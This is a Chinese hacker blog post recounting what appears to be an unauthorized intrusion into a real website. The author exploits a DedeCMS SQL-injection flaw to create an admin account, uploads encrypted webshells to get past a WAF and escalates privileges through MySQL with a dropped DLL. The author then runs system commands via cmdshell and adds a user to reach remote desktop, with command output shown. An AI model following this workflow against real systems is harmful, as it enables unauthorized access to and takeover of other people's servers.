提权 ·

路过一站,命令查找3389小tip

今天看一个站,WVS,御剑,WWWSCAN。无果

于是导出C段url扔到神器椰树中跑了一下cms的exp检测,发现一个guige后门于是访问9090的广告js文件,放到菜刀进行连接,我去?403?

看了头信息觉得是狗!

访问网站试了几个exp

还真是。

这最关键。。。居然是默认后台,在几个爆菊exp无望下手抖试了下DeDeCMS变量注入引发二次SQL注入中的直接添加帐号密码那个,在seay牛博客有http://www.cnseay.com/2963/

成功进入后台

新建文件,写入小马,菜刀链接,我去?还是403,找了K8哥哥的各种过狗一句话都没用,那么祭出大杀器weevely_Encryption,加密大马后成功访问。

看了data目录下数据库连接文件,是root权限

悲剧的是version>5.0,不能UDF,再上马!

Adm1n的高版本mysql提权脚本

顺利导出dll文件

顺理成章执行shell命令

成功添加用户尝试登录远程桌面发现端口错误,查看注册表键值的语句和位置也忘记了,于是百度方法命令如下:

CMD下命令查看终端端口开放和对应PID

第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!

而终端所对应的服务名为:TermService

SQL语句:select cmdshell('Tasklist/SVC')

 

映像名称                       PID 服务

========================= ======== ============================================

System Idle Process              0 暂缺

………………

svchost.exe                   2140 W3SVC, WAS

w3wp.exe                      2384 暂缺

w3wp.exe                      2504 暂缺

svchost.exe                   2664 TermService

……………………

--------------------------------------------完成!

第二步:用netstat -ano命令,列出所有端口对应的PID值!

找到PID值所对应的端口

SQL语句:select cmdshell('netstat -ano')

 

活动连接

 

协议  本地地址          外部地址        状态           PID

TCP    0.0.0.0:21             0.0.0.0:0              LISTENING       1208

TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4

TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       676

TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4

TCP    0.0.0.0:1234           0.0.0.0:0              LISTENING       4

TCP    0.0.0.0:2568           0.0.0.0:0              LISTENING       1356

TCP    0.0.0.0:2578           0.0.0.0:0              LISTENING       1208

TCP    0.0.0.0:3219           0.0.0.0:0              LISTENING       1388

TCP    0.0.0.0:3691           0.0.0.0:0              LISTENING       1208

TCP    0.0.0.0:6666           0.0.0.0:0              LISTENING       4

TCP    0.0.0.0:6789           0.0.0.0:0              LISTENING       4

TCP    0.0.0.0:6918           0.0.0.0:0              LISTENING       2664

TCP    0.0.0.0:8000           0.0.0.0:0              LISTENING       4

………………

--------------------------------------------完成!

OK了,connect the server,是ser08的

参与评论